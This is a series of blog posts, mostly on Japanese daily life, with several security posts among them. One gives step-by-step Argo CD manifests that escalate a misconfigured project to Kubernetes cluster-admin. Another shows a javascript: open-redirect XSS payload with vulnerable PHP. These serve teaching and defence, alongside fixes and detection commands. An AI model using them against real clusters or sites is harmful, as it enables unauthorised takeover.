	jwt := "eyJhbGciOiJSUzI1NiIsImtpZCI6IkJQbGNNeTdBeXdLQmZMaGw2N1dFZkJvUmtsdnVvdkxXWGsteTc5TmJPeGMifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJteS1uYW1lc3BhY2UiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoibXktc2VydmljZS1hY2NvdW50LXRva2VuLXA5NWRyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6Im15LXNlcnZpY2UtYWNjb3VudCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjdiYmViZGE2LTViMDUtNGFlNC05Yjg2LTBkODE0NWMwNzdhNSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpteS1uYW1lc3BhY2U6bXktc2VydmljZS1hY2NvdW50In0.dnvJE3LU7L8XxsIOwea3lUZAULdwAjV9_crHFLKBGNxEu70lk3MQmUbGTEFvawryArmxMa1bWF9wbK1GHEsNipDgWAmc0rmBYByP_ahlf9bI2EEzpaGU5s194csB_eG7kvfi1AHED_nkVTfvCjIJM-9oGICCjDJcoNOP1NAXICFmqvWfXl6SY3UoZvtzUOcH9-0hbARY3p6V5pPecW4Dm-yGub9PKZLJNzv7GxChM-uvBvHAt6o0UBIL4iSy6Bx2l91ojB-RSkm_oy0W9gKi9ZFQPgyvcvQnEfjoGdvNGlOEdFEdXvl-dP6iLBPnZ5xwhAk8lK0oOONWvQg6VDNd9w"

	// curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET https://192.168.64.2:8443/openid/v1/jwks
	jwksJSON := json.RawMessage(`{"keys":[{"use":"sig","kty":"RSA","kid":"BPlcMy7AywKBfLhl67WEfBoRklvuovLWXk-y79NbOxc","alg":"RS256","n":"tqzzgxqEkP7yZDwWGPwrFjlf8Ga7KExEQzPaF2VdtnLn1Xec5C2EDfwgXkr5irttvL7_CtItKh8SKjMjwrYZcoIagebIC5mRX3r4mqnG4z501_XtaYNxFSsPfbQz1yjrxr-07d3AyNmO_vbRHftNg3XJTyH5koG3oNS1k5eFZb8mq_drnAJ3rDEs9DAkoCMrv43EXiAOGosnHSUWGobVMBvn53jsfekq-eksT3uRLamKWaisXxqPlkzaqLzY2dIimFfFFPe3Q3OJEFIDqimFZKTaQu3JoMR2V2rTI_vXVCcvmMN0UZtGarr_Zaqx7eR7x2i-7X8Hd-6pWpOjmJNc8w","e":"AQAB"}]}`)

	// parse the jwks
	jwks, err := keyfunc.New(jwksJSON)
	if err != nil {
		log.Fatalf("Failed to create JWKS from JSON.\nError: %s", err.Error())
	}
	var pubKey *rsa.PublicKey
	for _, k := range jwks.Keys {
		pubKey, err = k.RSA()
		if err != nil {
			log.Fatalf("Failed to create JWKS from JSON.\nError: %s", err.Error())
		}
	}

	// validate the JWT
	object, err := gojose2.ParseSigned(jwt)
	if err != nil {
		log.Fatalf("Failed to create JWKS from JSON.\nError: %s", err.Error())
	}

	jwtContent, err := object.Verify(pubKey)
	if err != nil {
		log.Fatalf("Failed to create JWKS from JSON.\nError: %s", err.Error())
	}

	fmt.Printf("JWT verified, now do some authorization on the contents of it: %s", jwtContent)
}

Kubernetes: cannot get path "//.well-known/openid-configuration"

2021-05-24T07:00:00+00:00

I’ve been playing with using kubernetes service account JWTs to authenticate Pods. To get the cert for checking the JWT signature, I needed to hit the https://kubernetes.default.svc/.well-known/openid-configuration endpoint, however as the URL was coming from a config file it ended up being https://kubernetes.default.svc//.well-known/openid-configuration (mind the double //). This worked well locally where everything runs under the powerful default service account, but when deployed I got an error saying:

{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "forbidden: User \"system:serviceaccount:my-namespace:my-service-account\" cannot get path \"//.well-known/openid-configuration\"",
  "reason": "Forbidden",
  "details": {

  },
  "code": 403
}

The solution was to remove the second /, and hitting https://kubernetes.default.svc/.well-known/openid-configuration worked like a charm.

Googleing the error didn’t bring up anything useful, so I’m sharing it here in the hopes of saving others the debugging time.

Video for a Japanese learning podcast

2021-05-23T09:00:00+00:00

This week I got to help out with a video for a Japanese learning podcast episode by Momoko sensei. I like taking photos, especially to capture life in Japan, so I was very happy for this opportunity to show them to the world. Most of the photos in the video are mine, except the ones at the purikura section. Enjoy!

Times Car Share

2021-05-23T06:30:00+00:00

Even though Japan has amazing public transportation, sometimes having a car can make things so much better, like going for a day trip to the countryside or picking up someone at the station. This gets even more important as you leave Tokyo: for example Kyoto’s public transportation is mostly buses that can be significantly delayed due to traffic, and they are slower than cycling (due to stopping all the time). Moreover (especially on the weekend) they might only come once every 30 minutes, so you usually end up waiting at the bus stop for quite a while. Traditional car rentals are great for day trips, but get rather complicated and expensive for short trips.

The solution for this situation is car sharing: essentially a self-service car rental with support for very short rentals. I have been using Times Car Share, but other big players in the Japanese market are Orix and careco with very similar service and prices. At the end of the day it probably comes down to which one has a station close to where you live.

Neither companies have an English website, but they are generally manageable with Google Translate. After signing up online for Times, I had to go to one of their offices to show my driving license (I have a Japanese one, so not sure if international licenses are accepted) and pick up the membership card. They took a copy of my driving license, signed some papers and got the card. Overall it took less than 10 minutes.

Once you have the card, you can make reservations on the site and in the app. Cars can be picked up at designated stations (normal parking lots), and have to be returned to the same spot (so you always need to make a roundtrip). For short trips (less than 6 hours) you only pay per the time: 220 yen/15 minutes for the basic cars (330 yen and 440 yen for bigger cars), which includes fuel too, but not ETC. Over 6 hours there is a discount on the time charged, but you start to pay for distance. Check Times’ site for the details.

Moreover there is also a monthly minimum fee of 880 yen, e.g. if you only use the service for 500 yen in a given month, they will charge you an extra 880-500=380 yen at the end. Or as sometimes presented: the monthly subscription fee is 880 yen, which you can use for rentals in that month. There are family, student and corporate discounts to this. More info

Usage is billed from the start time of the reservation until the time you return the car (even if it’s before the end of the reservation). If you return the car after the end of reservation, extra fees are charged and your membership could be suspended (this is to avoid the next person having to wait for the car). Thus it is recommended to make a reservation for a few hours longer than the planned trip. The only limitation is that if the reservation is for more than 24 hours, but the actual use is less than 2 hours, then 2 hours will be charged. Seems reasonable to me.

You can open the car up to 15 minutes before the start of the reservation, but the billing still only starts at the beginning of the reservation, so you can get up to 15 minutes for free, which can be good especially for short trips. Not sure about the insurance coverage for this time though, so use it at your own risk.

Opening the car is done by touching the membership card to the card reader installed in one of the back windows of the car. This unlocks the car, and the key can be found in the glove compartment. At the end of the rental, after returning the car to the same parking spot, put the key back to its original place and touch the card to the reader again to close the doors and finish the rental. If you forgot something in the car, you can open it again one time, though I’ve never had to do this so far.

Upon return, the system sends you an email with a link to a 1 question questionnaire: did you find the car in a nice state? - yes, it was nice / no, there was some trash inside. Filling out this gets you 1 TCP point, and if the next person answers yes, then you get an extra 3 points. I don’t know of any penalties for getting a no. The cars are generally pretty clean. Maybe I find some trash 1 out of 5 times, usually pet bottles or masks. Nothing super gross or dirty so far.

About the TCP point system: you get points for various things:

the aforementioned cleanliness questionnaire: 1 or 3 points
driving without sudden acceleration or braking (no +25 km/h in 3 seconds, or -35 km/h in 3 seconds): 3 points
refueling: 3 points
for every 100 km driven: 5 points
for every 100 km driven without an accident: 5 points
filling out the how to use test: 30 points (first time)

You lose points for returning late, extending the rental during the rental time, making the car unusable, and illegal parking. The points are valid for a year. Above 100 points, you get to level 2, which makes the monthly fee 0. Level 3 (200 point+) gives middle class cars for the price of basic cars, while level 4 (500 point+) gives all cars for the price of a basic car. One can get 10 points for every 100 km driven, so to be on level 2 you need to drive 1000 km per year.

Refueling: since fuel is included in the rental fee, each car has a special credit card that you should use when filling up. If the tank is below half and you fill it up, then you get 30 minutes off from your rental. Due to this most of the cars are usually around 80% full. The way I usually do this is to go to a normal petrol station (フルサービス, not a セルフ) and just give the card to the station staff. This is good, because not all stations accept the card, and it’s also very convenient as I don’t even need to leave the car.

They have a wide variety of cars, and I enjoy that I get to drive different brands and models from most major Japanese car manufacturers. I think it can be useful for people looking to buy a car too. I like that their website has detailed videos on how to use each car that one can watch before driving them. It’s been especially useful in the beginning, as I’m mainly used to manual transmission. On their website there is only one foreign car: in the premium category they have only MINI One CROSSOVER available at 11 stations all over Japan (for comparison one of my favorite cars, the Suzuki Swift is available at 1780 stations).

Some of the cars I drove:

Argo CD Privesc Example Walk Through

2021-05-19T07:00:00+00:00

My Argo CD Privilege Escalations post describes some privilege escalation possibilities, if Argo CD projects are not configured securely. In this post I’ll show a complete walkthrough on abusing one of these possible misconfigurations.

Given

Given an AppProject that forbids cluster resources entirely and namespace resources from rbac.authorization.k8s.io/v1 ruling out Role, RoleBinding etc.:

apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
  name: vulnerable-project
  namespace: argocd
spec:
  description: Example Project
  sourceRepos:
  - "*"
  destinations:
  - namespace: "*"
    server: https://kubernetes.default.svc
  clusterResourceBlacklist:
  - group: "*"
    kind: "*"
  namespaceResourceBlacklist:
  - group: rbac.authorization.k8s.io/v1
    kind: "*"

Goal

The goal is to get cluster-admin over the cluster.

How to

Since Argo CD AppProject and Application objects are allowed, we will use those. First we will need an application that will deploy our yaml files:

apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: gotta-pwn-em-all-prepare-app
  namespace: argocd
spec:
  project: vulnerable-project
  source:
    repoURL: https://github.com/my-team/my-team-apps.git
    targetRevision: HEAD
    path: manifest/gotta-pwn-em-all-prepare
  destination:
    server: https://kubernetes.default.svc
    namespace: argocd

The next files will be created in the https://github.com/my-team/my-team-apps repo under manifest/gotta-pwn-em-all-prepare/. Let’s make a super permissive AppProject here (the only restriction is that it will only deploy things from our team’s repo to prevent other’s abusing this):

apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
  name: gotta-pwn-em-all-project
  namespace: argocd
spec:
  description: Privilege Escalation Testing Project
  sourceRepos:
  - https://github.com/my-team/my-team-apps.git
  destinations:
  - namespace: "*"
    server: "*"
  clusterResourceWhitelist:
  - group: "*"
    kind: "*"
  namespaceResourceWhitelist:
  - group: "*"
    kind: "*"

We will also need an Application that uses this project. We can make it with the other Applications or in the same folder as the above AppProject:

apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: gotta-pwn-em-all-execute-app
  namespace: argocd
spec:
  project: gotta-pwn-em-all-project
  source:
    repoURL: https://github.com/my-team/my-team-apps.git
    targetRevision: HEAD
    path: manifest/gotta-pwn-em-all-execute
  destination:
    server: https://kubernetes.default.svc
    namespace: default

(The app will only have non-namespace resources, so the namespace in destination doesn’t matter.) In the manifest/gotta-pwn-em-all-execute/ folder, let’s make the thing we actually want to be deployed:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: gotta-pwn-em-all-clusteradmin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: User
    name: oidc:johnsmith
  - kind: Group
    name: oidc:security-team

So in the end you should have these files (assuming the files are named like the objects in them):

https://github.com/my-team/my-team-apps:
  ↳ applications/
    - gotta-pwn-em-all-prepare-app.yaml
  ↳ manifest/
    ↳ gotta-pwn-em-all-prepare/
      - gotta-pwn-em-all-project.yaml
      - gotta-pwn-em-all-execute-app.yaml
    ↳ gotta-pwn-em-all-execute/
      - gotta-pwn-em-all-clusteradmin.yaml

Argo CD Privilege Escalations

2021-05-19T06:30:00+00:00

Consider a multi-team GitOps setup with Argo CD: each team has their own repository that holds the team’s Kubernetes yaml files that Argo CD deploys to a shared cluster. Inside the cluster, teams are separated into their own namespaces, and Argo CD only deploys resources to the namespace that belongs to the given team.

Let’s see how this setup can be misconfigured to allow deploying to other team’s namespaces or to the cluster level!

First we need to understand how Argo CD manages permissions (in the context of what can be deployed from a given repository), and for that we need to look into the Application and AppProject Kubernetes objects used by Argo CD.

Argo CD Application

The Application CRD is the Kubernetes resource object representing a deployed application instance in an environment (source)

For example (source):

apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: guestbook
  namespace: argocd
spec:
  project: my-project
  source:
    repoURL: https://github.com/argoproj/argocd-example-apps.git
    targetRevision: HEAD
    path: guestbook
  destination:
    server: https://kubernetes.default.svc
    namespace: guestbook

This object instructs Argo to grab the HEAD of https://github.com/argoproj/argocd-example-apps.git, go into the guestbook folder, take all yaml files from there and deploy them to the https://kubernetes.default.svc cluster into the guestbook namespace. (The namespace defined here is just the default one, the yaml files can override it.)

Let’s take a note of the project: my-project declaration too, which specifies the Argo CD AppProject this Application is part of, which will be very imprtoant for the permissions.

Since this Application itself is a Kubernetes object, the folder it deploys from can contain other Applications or AppProjects (see), which is often used to delege deployment and deploy applications from multiple repos, e.g. from separate repos of each team.

The Application object itself always goes to the argocd namespace in the cluster where Argo CD is deployed. (Though this namespace can be renamed.)

Argo CD AppProject

The AppProject CRD is the Kubernetes resource object representing a logical grouping of applications. (source)

For example (based on):

apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
  name: my-project
  namespace: argocd
spec:
  description: Example Project
  sourceRepos:
  - https://github.com/argoproj/argocd-example-apps.git
  - https://github.com/argoproj/other-example-app.git
  destinations:
  - namespace: guestbook
    server: https://kubernetes.default.svc
  # Deny all cluster-scoped resources from being created, except for Namespace
  clusterResourceWhitelist:
  - group: ''
    kind: Namespace
  # Allow all namespaced-scoped resources to be created, except for ResourceQuota, NetworkPolicy
  namespaceResourceBlacklist:
  - group: ''
    kind: ResourceQuota
  - group: ''
    kind: NetworkPolicy

For most attributes "*" can be used too to indicate everything (e.g. deploy from any source repo, deploy to any namespace or server, allow or deny all resources).

Most of the attributes are defining the permissions for the apps that belong to this project. Any Application deployed to the cluster can use any of the existing projects, and the projects can not restrict this (e.g. you can’t say that only Applications, whos yaml file is in https://github.com/argoproj/argocd-example-apps.git may use the my-project project). Restrictions can only be applied to the resources deployed by the apps.

sourceRepos define the list of repositories the Applications of this AppProject can deploy from (so the possible values for spec.source.repoURL of Application). Wildcards are supported, but when used as part of a string, the * stops at / (e.g. https://github.com/proj/* will match https://github.com/proj/app but not https://github.com/proj/app/module). For this usecase ** was added, though I haven’t tested that. "*" works as elsewhere and matches everything.

destinations define the list of namespaces and clusters resources can be deployed to, matching the Application’s spec.destination. Keep in mind that defining a namespace here doesn’t prevent non-namespaced resources to be deployed to the defined server.

Kubernetes has namespaced and non-namespaced (or cluster) resources and AppProject defines permissions for the two category separately (similarly to Role and ClusterRole):

clusterResourceWhitelist or clusterResourceBlacklist specifies which non-namespaced objects can be deployed (Blacklist forbids the listed objects, but allows everything else. Whitelist allows the listed, forbids everything else.)
namespaceResourceWhitelist or namespaceResourceBlacklist specifies which namespaced objects can be deployed

What happens if neither black- nor whitelist is defined for an object type? For namespace resources the default is to allow all, while for cluster resources the default is to deny all (though there used to be a bug allowing both). Not defined or defined as an empty array behaves the same (last time I checked), so if you want to forbid everything, then instead of setting Whitelist to an empty array, set Blacklist to "*", e.g.:

  namespaceResourceBlacklist:
  - group: "*"
    kind: "*"

This can get tricky (e.g. what happens if both whitelist and blacklist is defined), so I recommend looking at the source code of Argo CD: the IsGroupKindPermitted function handles this logic.

The AppProject object itself always goes to the argocd namespace in the cluster where Argo CD is deployed.

Privilege escalations

With all of this out of the way, lets look into potential issues in this. The goal is to deploy to a place we shouldn’t be able to deploy to, for example:

deploy a ClusterRoleBinding that gives us cluster-admin 👑
deploy a RoleBinding that gives us admin over an other namespace 🤘
deploy a Pod that uses someone elses’s resources 👌

AppProject with too permissive `[cluster|namespace]Resource[White|Black]list` configuration

Generally namespace resources are yours if you can deploy to the namespace. If your user has limited access via kubectl, you can still deploy a RoleBinding to the namespace to give you admin over the namespace, but that will still be limited to your own namespace. However if the clusterResource[White|Black]lists are not properly configured, that can give you cluster-admin over the entire cluster.

For example consider a project with this configuration:

...
clusterResourceBlacklist:
- group: ''
  kind: Namespace
namespaceResourceBlacklist:
- group: ''
  kind: ResourceQuota
- group: ''
  kind: NetworkPolicy

This will allow RoleBindings into the namespace, but also ClusterRoleBindings to the cluster.

AppProject with wildcard sourceRepos

If an other team’s AppProject is defined like this:

...
metadata:
  name: other-team-project
  namespace: argocd
spec:
  description: Example Project
  sourceRepos:
  - "*"
  destinations:
  - namespace: other-team
    server: https://kubernetes.default.svc
...

Then we can use it to deploy to their namespace by simple setting our Application’s project to other-team-project while using yaml files from our own repo:

...
spec:
  project: other-team-project
  source:
    repoURL: https://github.com/my-team/my-team-apps.git
    targetRevision: HEAD
    path: manifest/gotta-pwn-em-all
  destination:
    server: https://kubernetes.default.svc
    namespace: other-team

Whether we can get admin, or if we can only deploy Pods to the other team’s namespace depends on the [cluster|namespace]Resource[White|Black]list configuration for the project.

The same is possible if the sourceRepos are not fully wildcard, but they match our repo, e.g. - https://github.com/** or - https://github.com/*/* or - https://github.com/our-org/* would work with a repo of https://github.com/our-org/my-team.git.

AppProject with wildcard destination

If you can use a project with a wildcard destination (either because it’s your own project, or because the sourceRepos also has wildcard), like this:

...
metadata:
  name: my-project
  namespace: argocd
spec:
  description: Example Project
  sourceRepos:
  - https://github.com/my-team/my-team-apps.git
  destinations:
  - namespace: "*"
    server: https://kubernetes.default.svc
...

This allows to deploy to any other namespace in the cluster, but directly doing so will be limited by the [cluster|namespace]Resource[White|Black]list configuration for the project. However if the cluster also stores the Argo CD Application and AppProject objects, then using those, one can deploy a new, super-permissive AppProject and use that to deploy anything. Moreover these can be deployed to any cluster managed by Argo CD, not only the cluster the original project could deploy to.

Click here for the complete walk through of this excercise.

The default AppProject

Every application belongs to a single project. If unspecified, an application belongs to the default project, which is created automatically and by default, permits deployments from any source repo, to any cluster, and all resource Kinds. The default project can be modified, but not deleted. When initially created, it’s specification is configured to be the most permissive:

spec:
  sourceRepos:
  - '*'
  destinations:
  - namespace: '*'
    server: '*'
  clusterResourceWhitelist:
  - group: '*'
    kind: '*'

(Source: Argo Docs)

I think at this point I don’t need to explain why this can lead to problems. Any Application can use the default project and if the project isn’t changed, than the app can deploy anything to anywhere. Sweet!

Here is how to fix this

Since the docs are clear that this project can't be deleted, the only way to fix it is to redefine with restricted permissions, e.g.

# Every application belongs to a single project. If unspecified, an application belongs
# to the default project, which is created automatically and by default, permits deployments
# from any source repo, to any cluster, and all resource Kinds.
# https://argoproj.github.io/argo-cd/user-guide/projects/#the-default-project
# As this can be used for privilege escalation, the project has to be restricted
apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
  name: default
spec:
  description: DO NOT USE! - Argo CD's default project
  sourceRepos: []
  destinations: []

kubectl commands to help find these misconfigurations

Run these commands against the cluster that has the AppProject files, e.g.:

kubectl config use-context infra

I’m using the --all-namespaces flag, but if you know the namespace where AppProjects are deployed (e.g. argocd), then you can use -n argocd instead.

Only `clusterResourceBlacklist` is defined without `clusterResourceWhitelist`

kubectl get AppProject --all-namespaces -o json | jq -r '.items[] | select(.spec.clusterResourceBlacklist != null) | select(.spec.clusterResourceWhitelist == null) | {name: .metadata.name, clusterResourceBlacklist: .spec.clusterResourceBlacklist}'

Of course if this returns "*" that’s fine, but if it tries to list all the bad things, then you should take an other look.

Wildcard `sourceRepos`

Only for "*":

kubectl get AppProject --all-namespaces -o json | jq -r '.items[] | select([.spec.sourceRepos[] == "*"] | any) | {name: .metadata.name, sourceRepos: .spec.sourceRepos}'

Any URL that contains * (e.g. https://github.com/ourorg/*):

kubectl get AppProject --all-namespaces -o json | jq -r '.items[] | select(.spec.sourceRepos[] | test("\\*")) | {name: .metadata.name, sourceRepos: .spec.sourceRepos}'

(jq pattern matching from SO)

Wildcard `destinations`

namespace is *:

kubectl get AppProject --all-namespaces -o json | jq -r '.items[] | select([.spec.destinations[] | .namespace == "*"] | any) | {name: .metadata.name, destinations: .spec.destinations}'

namespace, server or name is * (name is sometimes used instead of server):

kubectl get AppProject --all-namespaces -o json | jq -r '.items[] | select([.spec.destinations[] | .namespace == "*" or .server == "*" or .name == "*"] | any) | {name: .metadata.name, destinations: .spec.destinations}'

Example yaml files to use for demonstration

Give me cluster-admin! (Full admin over the entire cluster)

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: gotta-pwn-em-all
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: User
    name: oidc:johnsmith
  - kind: Group
    name: oidc:security-team

Admin on the cluster (almost as good as cluster-admin)

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: gotta-pwn-em-all
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: admin
subjects:
  - kind: User
    name: oidc:johnsmith
  - kind: Group
    name: oidc:security-team

Admin within a namespace

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: gotta-pwn-em-all
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: admin
subjects:
  - kind: User
    name: oidc:johnsmith
  - kind: Group
    name: oidc:security-team

Aggregate to view

If you can’t create a RoleBinding, but have view role already, try adding a new Role or ClusterRole that aggregates to view:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: gotta-pwn-em-all
  labels:
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-view: "true"
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: gotta-pwn-em-all
  labels:
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-view: "true"
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

Only use this in a testing environment, as this effectively gives everyone with view role full admin access to the namespace or cluster!

PayPay - pay with your phone

2021-05-17T00:00:00+00:00

Japan is famous for it’s love for cash and the people are very reluctant to use anything else. The government even had a 2-5% cashback program on most cashless payments in 2019-2020 to change this. Even after this, credit cards are often not accepted, especially at smaller shops or restaurants. On the other hand Japan has a handful of barcode-based mobile payment solutions: PayPay, LinePay, auPay, RakutenPay, FamiPay, MerPay etc., out of which PayPay seems to be the most widely accepted (in my experience).

PayPay manifests itself as a mobile app that you can use to pay at certain places. You can top-up your balance via linking your bank account or at selected ATMs (all 7Eleven Bank ATMs work for sure), and you can also send/receive money from other users. Alternatively you can also link your credit/debit card and let PayPay charge that at the time of payment. This avoids having to top-up the balance, however most of the PayPay campaigns (e.g. cashbacks) won’t work.

Ways to pay

The shop scans your bar code - just open the app and let the cashier scan the barcode displayed in the app. Once the payment is completed, the app will show the charged amount immediately (with a loud paypay sound). This method is generally used in bigger shops and restaurants, including chain ones (e.g. all konbinis accept PayPay this way)
You scan the shop’s code - the shop has a printed QR code identifying the place. You scan this code with your phone, input the amount, then show it to the seller and press Pay. This is especially popular in small restaurants or shops, e.g. one of my favorite ramen shops, my hairdresser, this greengrocer in Kyoto all accept PayPay this way. Sometimes even bigger businesses use this method, e.g. Toyota Rent a Car shops I’ve been in Kyoto and Nara, or the Amanohashidate Hotel, which I found suprising considering the high amounts they deal with.

On detailed instructions to setup and use, I’d recommend this guide.

Security as a user

The user-specific barcode is only valid for a single payment and up to 5 minutes, so the problem of cloning (like a credit/debit card) is non-existent here. Moreover unlike the card, the phone never leaves your hand. Also you can setup the app to ask for a fingerprint before paying which adds an extra layer of security should someone obtain your phone unlocked.

Security as a shop

This gets interesting. The first way of paying (the shops scans your code) seems fully secure. However in the second way everything happens on the user’s phone, so it would be possible for a malicious user to make an app that looks and acts like PayPay, but doesn’t actually send the money, and the shop would have no way to tell. When I only saw small places accepting PayPay this way, I just assumed that no one wants to rip off the old ramen shop guy, or that people tend to return to these places and there is a chance that they are the only ones using PayPay there, and then the shop would see at the end of the month that something is off. Car rentals and hotels accept it too, but they generally get a copy of your ID/driving license, so they can find you if they later realize you didn’t actually pay. At the end of the day however I don’t think anyone else thinks about it this much, and most places just trust the customers, the same way there are way less security guards in shops in Japan than in Europe. Pity crime is just way less of an issue here.

When it’s better than card

I was in a small greengrocer’s and they had signs of accepting cards and PayPay. I asked to pay by card and gave my debit card to the old guy. It quickly turned out that he wasn’t very familiar with how the card terminal worked, or which side of the card to scan. After a few minutes of trials I suggested that I can pay with PayPay too, which he accepted with a big smile of relief. I scanned the QR code, entered the amount and was done in less than 10 seconds. This convenience for the seller can be a significant edge over complicated card terminals especially for older and less tech savy sellers.

Advantages

I don’t like cash, as it’s dirty, heavy, takes time to pay and just one more thing to keep in mind: making sure you have enough, you have small notes etc. Also splitting the bill gets complicated. In Europe I was very happy that most places accepted cards, and with PayPass/payWave it became even more convenient for small amounts. Using PayPay is the closest thing to this convenience that I could find in Japan. I also enjoy the increased security and the campaigns (currently you get 0.5-1.5% cashback on all purchases made with PayPay balance). You do need a Japanese phone number to sign-up, but if you got that, then I definitelly recommend to do so and give it a try.

Coke ON - buy from vending machines with your phone

2021-05-16T00:00:00+00:00

Japan is full of drink vending machines:

However I don’t like coins. The vending machines at the train stations usually accept Suica, but elsewhere they are mostly cash only. Or that’s what I thought.

Meet Coke ON, the fun and reasonable (🤨) Coca-Cola official app, which lets you buy drinks from selected vending machines using your phone, paying with credit card, PayPay or LinePay. Moreover you get stamps for each purchase, that gets you a free drink after 15 stamps.

Google Play, Apple Store

Pros:

No need to carry cash (especially useful when running or cycling)
No need to touch coins or the machine (you select the drink on your phone, you only need to pick up the drink)
Occasional free drink for stamps

Cons:

Limited to Coca-Cola vending machines, so you might need to walk a bit to find one (the app has a map though, and I enjoy turning my runs into an orienting game)
Limited to Coca-Cola drinks - forget Pepsi, Pocari Sweat or melon soda 😢
Sometimes it can be more expensive, even with the stamps (see below)

How to use

Most of the app is available in English, and it’s pretty straight forward to use.

Download the app (Google Play, Apple Store)
Sign up in the app
Setup payment under Coke ON Pay - Payment Settings
Walk up to a vending machine with the Coke ON Pay logo (or use the map in the app). There are some vending machines that only have Coke ON and not Coke ON Pay, and with those you can only buy drinks with either the drink tickets you get for stamps, or with cash. Using the app when paying with cash still gets you the stamps though.
Have the app open on your phone with bluetooth turned on
As you put the phone close to the vending machine, they will connect via bluetooth and the app screen will change
The list of drinks available in the vending machine will appear on the screen
In the app, click on the drink you want to buy. It will open a floating ticket with a photo of the drink
Swipe the ticket toward the top of the screen to confirm the selection (this took me a while to figure out)
The vending machine will release the choosen drink, and the app will charge your registered payment method
The app will show the received stamp(s)

Does the saving makes sense?

So normally buying one drink will get you one stamp (though appr. 25% of the time there is a campaign giving 2 stamps per drink). After 15 stamps you get a drink ticket that can be exchanged for a single drink of any kind. No stamp is given if a drink is bought with a drink ticket. Assuming all drink cost the same, this comes down to getting 16 drinks for the price of 15, equalling to a saving of 1/16 or 6.25%. So in practice a 160 yen drink (the usual price for Aquarius) comes down to 150 yen, which could still be more expensive the the alternatives, for example this one:

Coke ON Pass

I haven’t personally tried, but Coca-Cola also offers a drink pass for 2700 yen/month giving you one free drink per day. If one uses it all 30 days, then one drink comes down to 90 yen, which is a decent price, though supermarkets might have the same drinks for 70-80 yen. However I assume most people’s weekday and weekend routine is significantly different, so if one can only use it during weekdays (so ~21 days a month), then one drink will be close to 130 yen. At that point a 100 yen Lawson or even directly buying some of the drinks from the same vending machine will be the same or cheaper (but prices might be higher around train stations):

So overall unless someone only drinks the most expensive drinks; they drink it realiable every single day, then this pass doesn’t seem to make sense financially.

Open-redirect to XSS

2021-05-12T00:00:00+00:00

Open redirects are generally treated as a low risk issue, due to the limited impact (more convincing phishing). However in certain cases a simple open redirect vulnerability can lead to reflected XSS, which I’ll talk about in this post.

Redirecting in a browser can happen in two ways:

The browser gets a 30x HTTP response code (e.g. 302 Found) with the destination of the redirect in the Location header
The JavaScript running on a site does the redirect by e.g. window.location.href='https://example.com' or window.location.assign('https://example.com'); or window.location.replace('https://example.com');

If an open redirect vulnerability exist with the second type of redirect, it might be an XSS as well using the javascript: pseudo-protocol. E.g. the following JavaScript code will pop up an alert:

url = "javascript:alert(document.domain)"; // coming from the user in real life
window.location.href= url;

Demo

Another great thing about this is that no redirect happens, so the injected JavaScript executes in the context of the current page (see document.domain from the alert), so it has access to the site the same way a normal XSS has.

Catch 1: Redirect doesn’t happen immediately

Consider the following JavaScript code:

url = ""; // coming from the user

if(!url.startsWith("https://example.com")) {
	window.location.href = "https://example.com";
}

window.location.href= url;

If the url doesn’t start with https://example.com, then we redirect to the main page; otherwise redirect to the url. However the redirect only happens after the JavaScript finished running, so the same attack still works: Demo.

Catch 2: Bypassing hostname checks

Sometimes to prevent open redirect the app checks if the URL points to a trusted hostname. Considering the numerous filter bypass techniques the general recommendation is to use a URL parser and check directly for the hostname, instead of trying to do some regex matching.

For example consider the following php code:

<?php

$url = $_GET["u"];

if(parse_url($url, PHP_URL_HOST) === "example.com" ) {
    echo "<script>window.location.href = '" . htmlspecialchars($url, ENT_QUOTES) . "';</script>";
} else {
    echo "<script>window.location.href = 'https://example.com';</script>";
}

Demo.

This takes the URL from a GET parameter, parses it using the built-in parse_url() function and redirects the user to it if the hostname is example.com. Otherwise the user is sent to the hardcoded main page.

